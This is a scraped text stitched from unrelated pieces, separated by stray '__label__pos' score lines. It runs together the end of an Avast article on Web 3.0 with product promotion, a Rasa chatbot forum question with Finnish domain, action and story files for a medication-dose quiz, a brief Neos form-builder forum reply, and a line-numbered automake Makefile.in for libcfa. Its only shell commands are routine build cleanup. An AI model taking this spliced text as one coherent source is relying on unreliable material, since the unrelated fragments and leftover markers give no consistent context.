+ mutex_unlock(&graph->cmd_lock);
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_graph_send_cmd_sync);
+
+static int audioreach_codec_dma_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_module_param_data *param_data;
+ struct apm_codec_dma_module_intf_cfg *intf_cfg;
+ struct apm_module_hw_ep_mf_cfg *hw_cfg;
+ struct apm_module_frame_size_factor_cfg *fs_cfg;
+ struct apm_module_hw_ep_power_mode_cfg *pm_cfg;
+ int ic_sz, ep_sz, fs_sz, pm_sz, dl_sz;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ ic_sz = APM_CDMA_INTF_CFG_PSIZE;
+ ep_sz = APM_HW_EP_CFG_PSIZE;
+ fs_sz = APM_FS_CFG_PSIZE;
+ pm_sz = APM_HW_EP_PMODE_CFG_PSIZE;
+ dl_sz = 0;
+
+ payload_size = ic_sz + ep_sz + fs_sz + pm_sz + dl_sz;
+
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ hw_cfg = p;
+ param_data = &hw_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_MF_CFG;
+ param_data->param_size = ep_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ hw_cfg->mf.sample_rate = rate;
+ hw_cfg->mf.bit_width = bits_per_sample;
+ hw_cfg->mf.num_channels = num_channels;
+ hw_cfg->mf.data_format = module->data_format;
+ p += ep_sz;
+
+ fs_cfg = p;
+ param_data = &fs_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_FRAME_SIZE_FACTOR;
+ param_data->param_size = fs_sz - APM_MODULE_PARAM_DATA_SIZE;
+ fs_cfg->frame_size_factor = 1;
+ p += fs_sz;
+
+ intf_cfg = p;
+ param_data = &intf_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_CODEC_DMA_INTF_CFG;
+ param_data->param_size = ic_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ intf_cfg->cfg.lpaif_type = module->hw_interface_type;
+ intf_cfg->cfg.intf_index = module->hw_interface_idx;
+ intf_cfg->cfg.active_channels_mask = (1 << num_channels) - 1;
+ p += ic_sz;
+
+ pm_cfg = p;
+ param_data = &pm_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_POWER_MODE_CFG;
+ param_data->param_size = pm_sz - APM_MODULE_PARAM_DATA_SIZE;
+ pm_cfg->power_mode.power_mode = 0;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_i2s_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_module_frame_size_factor_cfg *fs_cfg;
+ struct apm_module_param_data *param_data;
+ struct apm_i2s_module_intf_cfg *intf_cfg;
+ struct apm_module_hw_ep_mf_cfg *hw_cfg;
+ int ic_sz, ep_sz, fs_sz;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ ic_sz = APM_I2S_INTF_CFG_PSIZE;
+ ep_sz = APM_HW_EP_CFG_PSIZE;
+ fs_sz = APM_FS_CFG_PSIZE;
+
+ payload_size = ic_sz + ep_sz + fs_sz;
+
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+ intf_cfg = p;
+
+ param_data = &intf_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_I2S_INTF_CFG;
+ param_data->param_size = ic_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ intf_cfg->cfg.intf_idx = module->hw_interface_idx;
+ intf_cfg->cfg.sd_line_idx = module->sd_line_idx;
+ intf_cfg->cfg.ws_src = module->ws_src;
+
+ p += ic_sz;
+ hw_cfg = p;
+ param_data = &hw_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_MF_CFG;
+ param_data->param_size = ep_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ hw_cfg->mf.sample_rate = rate;
+ hw_cfg->mf.bit_width = bits_per_sample;
+ hw_cfg->mf.num_channels = num_channels;
+ hw_cfg->mf.data_format = module->data_format;
+
+ p += ep_sz;
+ fs_cfg = p;
+ param_data = &fs_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_FRAME_SIZE_FACTOR;
+ param_data->param_size = fs_sz - APM_MODULE_PARAM_DATA_SIZE;
+ fs_cfg->frame_size_factor = 1;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_logging_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module)
+{
+ struct apm_module_param_data *param_data;
+ struct data_logging_config *cfg;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ payload_size = sizeof(*cfg) + APM_MODULE_PARAM_DATA_SIZE;
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ param_data = p;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_DATA_LOGGING_CONFIG;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+
+ p = p + APM_MODULE_PARAM_DATA_SIZE;
+ cfg = p;
+ cfg->log_code = module->log_code;
+ cfg->log_tap_point_id = module->log_tap_point_id;
+ cfg->mode = module->mode;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_pcm_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_pcm_module_media_fmt_cmd *cfg;
+ struct apm_module_param_data *param_data;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ payload_size = APM_PCM_MODULE_FMT_CMD_PSIZE(num_channels);
+
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+ cfg = p;
+
+ param_data = &cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_PCM_OUTPUT_FORMAT_CFG;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+
+ cfg->header.data_format = DATA_FORMAT_FIXED_POINT;
+ cfg->header.fmt_id = MEDIA_FMT_ID_PCM;
+ cfg->header.payload_size = APM_PCM_OUT_FMT_CFG_PSIZE(num_channels);
+
+ cfg->media_cfg.alignment = PCM_LSB_ALIGNED;
+ cfg->media_cfg.bit_width = bits_per_sample;
+ cfg->media_cfg.endianness = PCM_LITTLE_ENDIAN;
+ cfg->media_cfg.interleaved = module->interleave_type;
+ cfg->media_cfg.num_channels = num_channels;
+ cfg->media_cfg.q_factor = bits_per_sample - 1;
+ cfg->media_cfg.bits_per_sample = bits_per_sample;
+
+ if (num_channels == 1) {
+ cfg->media_cfg.channel_mapping[0] = PCM_CHANNEL_L;
+ } else if (num_channels == 2) {
+ cfg->media_cfg.channel_mapping[0] = PCM_CHANNEL_L;
+ cfg->media_cfg.channel_mapping[1] = PCM_CHANNEL_R;
+ } else {
+ dev_err(graph->dev, "Error: Invalid channels (%d)!\n", num_channels);
+ }
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_shmem_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_module_param_data *param_data;
+ struct payload_media_fmt_pcm *cfg;
+ struct media_format *header;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ if (num_channels < 0 || num_channels > 2)
+ dev_err(graph->dev, "Error: Invalid channels (%d)!\n", num_channels);
+
+ payload_size = APM_SHMEM_FMT_CFG_PSIZE(num_channels) + APM_MODULE_PARAM_DATA_SIZE;
+
+ p = audioreach_alloc_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0,
+ graph->port->id, module->instance_id);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ param_data = p;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_MEDIA_FORMAT;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+ p = p + APM_MODULE_PARAM_DATA_SIZE;
+
+ header = p;
+ header->data_format = DATA_FORMAT_FIXED_POINT;
+ header->fmt_id = MEDIA_FMT_ID_PCM;
+ header->payload_size = payload_size - sizeof(*header);
+
+ p = p + sizeof(*header);
+ cfg = p;
+ cfg->sample_rate = rate;
+ cfg->bit_width = bits_per_sample;
+ cfg->alignment = PCM_LSB_ALIGNED;
+ cfg->bits_per_sample = bits_per_sample;
+ cfg->q_factor = bits_per_sample - 1;
+ cfg->endianness = PCM_LITTLE_ENDIAN;
+ cfg->num_channels = num_channels;
+
+ if (num_channels == 1) {
+ cfg->channel_mapping[0] = PCM_CHANNEL_L;
+ } else if (num_channels == 2) {
+ cfg->channel_mapping[0] = PCM_CHANNEL_L;
+ cfg->channel_mapping[1] = PCM_CHANNEL_R;
+ } else {
+ dev_err(graph->dev, "Error: Invalid channels (%d)!\n", num_channels);
+ }
+
+ rc = audioreach_graph_send_cmd_sync(graph, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_gain_set(struct q6apm_graph *graph,
+ struct audioreach_module *module)
+{
+ struct apm_module_param_data *param_data;
+ struct apm_gain_module_cfg *cfg;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ payload_size = APM_GAIN_CFG_PSIZE;
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+ cfg = p;
+
+ param_data = &cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = APM_PARAM_ID_GAIN;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+
+ cfg->gain_cfg.gain = module->gain;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+int audioreach_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ int rc;
+
+ switch (module->module_id) {
+ case MODULE_ID_DATA_LOGGING:
+ rc = audioreach_logging_set_media_format(graph, module);
+ break;
+ case MODULE_ID_PCM_DEC:
+ case MODULE_ID_PCM_ENC:
+ case MODULE_ID_PCM_CNV:
+ rc = audioreach_pcm_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ case MODULE_ID_I2S_SINK:
+ rc = audioreach_i2s_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ case MODULE_ID_WR_SHARED_MEM_EP:
+ rc = audioreach_shmem_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ case MODULE_ID_GAIN:
+ rc = audioreach_gain_set(graph, module);
+ break;
+ case MODULE_ID_CODEC_DMA_SINK:
+ case MODULE_ID_CODEC_DMA_SOURCE:
+ rc = audioreach_codec_dma_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ default:
+ rc = 0;
+ }
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_set_media_format);
+
+void audioreach_graph_free_buf(struct q6apm_graph *graph)
+{
+ struct audioreach_graph_data *port;
+ unsigned long flags;
+
+ spin_lock_irqsave(&graph->lock, flags);
+ port = &graph->rx_data;
+ port->num_periods = 0;
+ kfree(port->buf);
+ port->buf = NULL;
+
+ port = &graph->tx_data;
+ port->num_periods = 0;
+ kfree(port->buf);
+ port->buf = NULL;
+ spin_unlock_irqrestore(&graph->lock, flags);
+}
+EXPORT_SYMBOL_GPL(audioreach_graph_free_buf);
+
+int audioreach_map_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir, size_t period_sz,
+ unsigned int periods,
+ bool is_contiguous)
+{
+ struct apm_shared_map_region_payload *mregions;
+ struct apm_cmd_shared_mem_map_regions *cmd;
+ uint32_t num_regions, buf_sz, payload_size;
+ struct audioreach_graph_data *data;
+ struct audio_buffer *ab;
+ unsigned long flags;
+ struct gpr_pkt *pkt;
+ void *p;
+ int rc, i;
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ if (is_contiguous) {
+ num_regions = 1;
+ buf_sz = period_sz * periods;
+ } else {
+ buf_sz = period_sz;
+ num_regions = periods;
+ }
+
+ /* DSP expects size should be aligned to 4K */
+ buf_sz = ALIGN(buf_sz, 4096);
+
+ payload_size = sizeof(*cmd) + (sizeof(*mregions) * num_regions);
+
+ p = audioreach_alloc_apm_pkt(payload_size,
+ APM_CMD_SHARED_MEM_MAP_REGIONS, dir,
+ graph->port->id);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE;
+ cmd = p;
+ cmd->mem_pool_id = APM_MEMORY_MAP_SHMEM8_4K_POOL;
+ cmd->num_regions = num_regions;
+
+ cmd->property_flag = 0x0;
+
+ mregions = p + sizeof(*cmd);
+
+ spin_lock_irqsave(&graph->lock, flags);
+
+ for (i = 0; i < num_regions; i++) {
+ ab = &data->buf[i];
+ mregions->shm_addr_lsw = lower_32_bits(ab->phys);
+ mregions->shm_addr_msw = upper_32_bits(ab->phys);
+ mregions->mem_size_bytes = buf_sz;
+ ++mregions;
+ }
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = audioreach_graph_send_cmd_sync(graph, pkt,
+ APM_CMD_RSP_SHARED_MEM_MAP_REGIONS);
+
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_map_memory_regions);
+
+int audioreach_shared_memory_send_eos(struct q6apm_graph *graph)
+{
+ struct data_cmd_wr_sh_mem_ep_eos *eos;
+ struct gpr_pkt *pkt;
+ int rc = 0, iid;
+ void *p;
+
+ iid = q6apm_graph_get_rx_shmem_module_iid(graph);
+ p = audioreach_alloc_cmd_pkt(sizeof(*eos),
+ DATA_CMD_WR_SH_MEM_EP_EOS,
+ 0,
+ graph->port->id, iid);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ eos = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ eos->policy = WR_SH_MEM_EP_EOS_POLICY_LAST;
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_shared_memory_send_eos);
diff --git a/sound/soc/qcom/audioreach/audioreach.h b/sound/soc/qcom/audioreach/audioreach.h
index e5736fdda66b..07423369cc84 100644
--- a/sound/soc/qcom/audioreach/audioreach.h
+++ b/sound/soc/qcom/audioreach/audioreach.h
@@ -627,4 +627,20 @@ void *audioreach_alloc_pkt(int pkt_size, uint32_t opcode, uint32_t token,
void *audioreach_alloc_graph_pkt(struct q6apm *apm,
struct list_head *sg_list,
int graph_id);
+/* Module specific */
+void audioreach_graph_free_buf(struct q6apm_graph *graph);
+int audioreach_map_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir, size_t period_sz,
+ unsigned int periods,
+ bool is_contiguous);
+int audioreach_graph_send_cmd_sync(struct q6apm_graph *graph,
+ struct gpr_pkt *pkt,
+ uint32_t rsp_opcode);
+int audioreach_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample);
+int audioreach_shared_memory_send_eos(struct q6apm_graph *graph);
#endif /* __AUDIOREACH_H__ */
diff --git a/sound/soc/qcom/audioreach/q6apm.c b/sound/soc/qcom/audioreach/q6apm.c
index d0deb69114b0..6a98c114ea7a 100644
--- a/sound/soc/qcom/audioreach/q6apm.c
+++ b/sound/soc/qcom/audioreach/q6apm.c
@@ -309,6 +309,172 @@ int q6apm_connect_sub_graphs(struct q6apm *apm, u32 src_sgid,
return 0;
}
+int q6apm_graph_media_format_shmem(struct q6apm_graph *graph,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct audioreach_module *module;
+
+ if (direction == SNDRV_PCM_STREAM_CAPTURE)
+ module = q6apm_find_module_by_mid(graph,
+ MODULE_ID_RD_SHARED_MEM_EP);
+ else
+ module = q6apm_find_module_by_mid(graph,
+ MODULE_ID_WR_SHARED_MEM_EP);
+
+ if (!module)
+ return -ENODEV;
+
+ audioreach_set_media_format(graph, module, direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+
+ return 0;
+
+}
+EXPORT_SYMBOL_GPL(q6apm_graph_media_format_shmem);
+
+int q6apm_map_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir, phys_addr_t phys,
+ size_t period_sz, unsigned int periods)
+{
+ struct audioreach_graph_data *data;
+ struct audio_buffer *buf;
+ unsigned long flags;
+ int cnt;
+ int rc;
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ spin_lock_irqsave(&graph->lock, flags);
+
+ if (data->buf) {
+ dev_err(graph->dev, "Buffer already allocated\n");
+ spin_unlock_irqrestore(&graph->lock, flags);
+ return 0;
+ }
+
+ buf = kzalloc(((sizeof(struct audio_buffer)) * periods), GFP_ATOMIC);
+ if (!buf) {
+ spin_unlock_irqrestore(&graph->lock, flags);
+ return -ENOMEM;
+ }
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ data->buf = buf;
+
+ buf[0].phys = phys;
+ buf[0].size = period_sz;
+
+ for (cnt = 1; cnt < periods; cnt++) {
+ if (period_sz > 0) {
+ buf[cnt].phys = buf[0].phys + (cnt * period_sz);
+ buf[cnt].size = period_sz;
+ }
+ }
+ data->num_periods = periods;
+
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = audioreach_map_memory_regions(graph, dir, period_sz,
+ periods, 1);
+ if (rc < 0) {
+ dev_err(graph->dev, "Memory_map_regions failed\n");
+ audioreach_graph_free_buf(graph);
+ }
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_map_memory_regions);
+
+int q6apm_unmap_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir)
+{
+ struct audioreach_graph_data *data;
+ struct apm_cmd_shared_mem_unmap_regions *cmd = NULL;
+ struct gpr_pkt *pkt;
+ void *p;
+ int rc;
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ if (!data->mem_map_handle) {
+ return 0;
+ }
+
+ p = audioreach_alloc_apm_pkt(sizeof(*cmd),
+ APM_CMD_SHARED_MEM_UNMAP_REGIONS, dir,
+ graph->port->id);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ cmd = p + GPR_HDR_SIZE;
+ cmd->mem_map_handle = data->mem_map_handle;
+
+ rc = audioreach_graph_send_cmd_sync(graph, pkt, APM_CMD_SHARED_MEM_UNMAP_REGIONS);
+ kfree(pkt);
+
+ audioreach_graph_free_buf(graph);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_unmap_memory_regions);
+
+int q6apm_graph_media_format_pcm(struct q6apm_graph *graph,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct audioreach_graph_info *info = graph->info;
+ struct audioreach_sub_graph *sgs;
+ struct audioreach_container *container;
+ struct audioreach_module *module;
+
+ list_for_each_entry(sgs, &info->sg_list, node) {
+ list_for_each_entry(container, &sgs->container_list, node) {
+ list_for_each_entry(module, &container->modules_list, node) {
+ if ((MODULE_ID_WR_SHARED_MEM_EP == module->module_id) ||
+ (MODULE_ID_WR_SHARED_MEM_EP == module->module_id))
+ continue;
+
+ audioreach_set_media_format(graph, module, direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ }
+ }
+ }
+
+ return 0;
+
+}
+EXPORT_SYMBOL_GPL(q6apm_graph_media_format_pcm);
+
+static int q6apm_graph_get_tx_shmem_module_iid(struct q6apm_graph *graph)
+{
+ struct audioreach_module *module;
+
+ module = q6apm_find_module_by_mid(graph, MODULE_ID_RD_SHARED_MEM_EP);
+ if (!module)
+ return -ENODEV;
+
+ return module->instance_id;
+
+}
+
int q6apm_graph_get_rx_shmem_module_iid(struct q6apm_graph *graph)
{
struct audioreach_module *module;
@@ -322,6 +488,105 @@ int q6apm_graph_get_rx_shmem_module_iid(struct q6apm_graph *graph)
}
EXPORT_SYMBOL_GPL(q6apm_graph_get_rx_shmem_module_iid);
+int q6apm_write_async(struct q6apm_graph *graph, uint32_t len, uint32_t msw_ts,
+ uint32_t lsw_ts, uint32_t wflags)
+{
+ struct gpr_pkt *pkt;
+ void *p;
+ int rc, payload_size, iid;
+ struct apm_data_cmd_wr_sh_mem_ep_data_buffer_v2 *write;
+ struct audio_buffer *ab;
+ unsigned long flags;
+
+ payload_size = sizeof(*write);
+
+ iid = q6apm_graph_get_rx_shmem_module_iid(graph);
+ p = audioreach_alloc_pkt(payload_size,
+ DATA_CMD_WR_SH_MEM_EP_DATA_BUFFER_V2,
+ graph->rx_data.dsp_buf,
+ graph->port->id, iid);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE;
+ write = p;
+
+ spin_lock_irqsave(&graph->lock, flags);
+ ab = &graph->rx_data.buf[graph->rx_data.dsp_buf];
+
+ write->buf_addr_lsw = lower_32_bits(ab->phys);
+ write->buf_addr_msw = upper_32_bits(ab->phys);
+ write->buf_size = len;
+ write->timestamp_lsw = lsw_ts;
+ write->timestamp_msw = msw_ts;
+ write->mem_map_handle = graph->rx_data.mem_map_handle;
+
+ //FIXME use other flags
+ if (wflags == NO_TIMESTAMP)
+ write->flags = 0;
+ else
+ write->flags = 0x80000000;
+
+ graph->rx_data.dsp_buf++;
+
+ if (graph->rx_data.dsp_buf >= graph->rx_data.num_periods)
+ graph->rx_data.dsp_buf = 0;
+
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_write_async);
+
+int q6apm_read(struct q6apm_graph *graph)
+{
+ struct data_cmd_rd_sh_mem_ep_data_buffer_v2 *read;
+ struct audioreach_graph_data *port;
+ struct audio_buffer *ab;
+ struct gpr_pkt *pkt;
+ unsigned long flags;
+ int rc = 0, iid;
+ void *p;
+
+ iid = q6apm_graph_get_tx_shmem_module_iid(graph);
+ p = audioreach_alloc_pkt(sizeof(*read),
+ DATA_CMD_RD_SH_MEM_EP_DATA_BUFFER_V2,
+ graph->tx_data.dsp_buf,
+ graph->port->id, iid);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ read = p + GPR_HDR_SIZE;
+
+ spin_lock_irqsave(&graph->lock, flags);
+ port = &graph->tx_data;
+ ab = &port->buf[port->dsp_buf];
+
+ read->buf_addr_lsw = lower_32_bits(ab->phys);
+ read->buf_addr_msw = upper_32_bits(ab->phys);
+ read->mem_map_handle = port->mem_map_handle;
+ read->buf_size = ab->size;
+
+ port->dsp_buf++;
+
+ if (port->dsp_buf >= port->num_periods)
+ port->dsp_buf = 0;
+
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_read);
+
static int graph_callback(struct gpr_resp_pkt *data, void *priv, int op)
{
struct q6apm_graph *graph = priv;
|
__label__pos
| 0.99784 |
1. youngking
2. mycloud
Commits
Russell Power committed ceb6561
Better logging; rather then sucking down stderr and stdout, workers
now send log messages via UDP to the controller and also log to local
temp files.
Worker watchdog now runs in a separate thread; this allows workers to
be shutdown in in the middle of long running map tasks.
• Participants
• Parent commits 10e1305
• Branches default
Comments (0)
Files changed (7)
File src/mycloud/__init__.py
View file
+#!/usr/bin/env python
+
import mycloud.cluster
-import mycloud.connections
-import mycloud.mapreduce
-import mycloud.merge
-import mycloud.resource
-import mycloud.util
-
-resource = mycloud.resource
-mapreduce = mycloud.mapreduce
Cluster = mycloud.cluster.Cluster
File src/mycloud/cluster.py
View file
import mycloud.thread
import mycloud.util
import random
+import socket
import sys
import traceback
import xmlrpclib
mycloud.thread.init()
+class ClusterException(Exception):
+ pass
+
def arg_name(args):
'''Returns a short string representation of an argument list for a task.'''
a = args[0]
return a.__class__.__name__
return repr(a)
-
class Task(object):
'''A piece of work to be executed.'''
- def __init__(self, idx, function, args, kw):
- self.idx = idx
- self.pickle = cloudpickle.dumps((function, args, kw))
+ def __init__(self, name, index, function, args, kw):
+ self.idx = index
+ self.pickle = xmlrpclib.Binary(cloudpickle.dumps((function, args, kw)))
self.result = None
self.done = False
def run(self, client):
logging.info('Starting task %s on %s', self.idx, client)
self.client = client
- result_data = self.client.execute_task(xmlrpclib.Binary(self.pickle))
+ result_data = self.client.execute_task(self.pickle)
self.result = cPickle.loads(result_data.data)
self.done = True
logging.info('Task %d finished', self.idx)
A Server is created for each core on a machine, and executes tasks as
machine resources become available.'''
- def __init__(self, cluster, host):
+ def __init__(self, cluster, host, index):
self.cluster = cluster
self.host = host
- ssh = mycloud.connections.SSHConnection.connect(host)
+ self.index = index
+
+ def connect(self):
+ ssh = mycloud.connections.SSH.connect(self.host)
self.stdin, self.stdout, self.stderr = ssh.invoke(
- sys.executable, '-m', 'mycloud.worker')
+ sys.executable,
+ '-m', 'mycloud.worker',
+ '--index %s' % self.index,
+ '--logger_host %s' % socket.gethostname(),
+ '--logger_port %s' % logging.handlers.DEFAULT_UDP_LOGGING_PORT)
self.port = int(self.stdout.readline().strip())
- self.stderr_logger = (
- mycloud.util.StreamLogger(
- 'Remote(%s, %d)' % (self.host, self.port), buffer=False))
- self.stderr_logger.start(self.stderr)
-
self.ready = True
self.thread = None
-# assert self.client().healthcheck() == 'alive'
-
def start_task(self, task):
self.ready = False
self.thread = mycloud.thread.spawn(self._run_task, task)
try:
task.run(self.client())
except:
-# logging.info('Exception!', exc_info=1)
+ #logging.exception('Failed to run task')
self.cluster.report_exception(sys.exc_info())
+ self.stdin.close()
+ self.stdout.close()
finally:
self.ready = True
class Cluster(object):
- def __init__(self, machines=None, fs_prefix='/gfs'):
+ def __init__(self, machines=None, tmp_prefix=None):
self.machines = machines
- self.fs_prefix = fs_prefix
+ self.tmp_prefix = tmp_prefix
self.servers = None
self.exceptions = []
+ assert self.machines
+ assert self.tmp_prefix
+
self.start()
def __del__(self):
def report_exception(self, exc):
self.exceptions.append(exc)
+ def log_exceptions(self):
+ for e in self.exceptions:
+ exc_dump = ['remote exception: ' + line
+ for line in traceback.format_exception(*e)]
+ logging.info('\n'.join(exc_dump))
+
def start(self):
+ self.log_server = mycloud.util.LoggingServer(self)
+ mycloud.thread.spawn(self.log_server.serve_forever)
+
servers = []
+ index = 0
for host, cores in self.machines:
for i in xrange(cores):
- servers.append(
-# Server(self, host))
- mycloud.thread.spawn(lambda c, h: Server(c, h), self, host))
+ s = Server(self, host, index)
+ servers.append(s)
+ index += 1
- servers = [s.wait() for s in servers]
+ connections = [mycloud.thread.spawn(s.connect) for s in servers]
+ [c.wait() for c in connections]
+
self.servers = servers
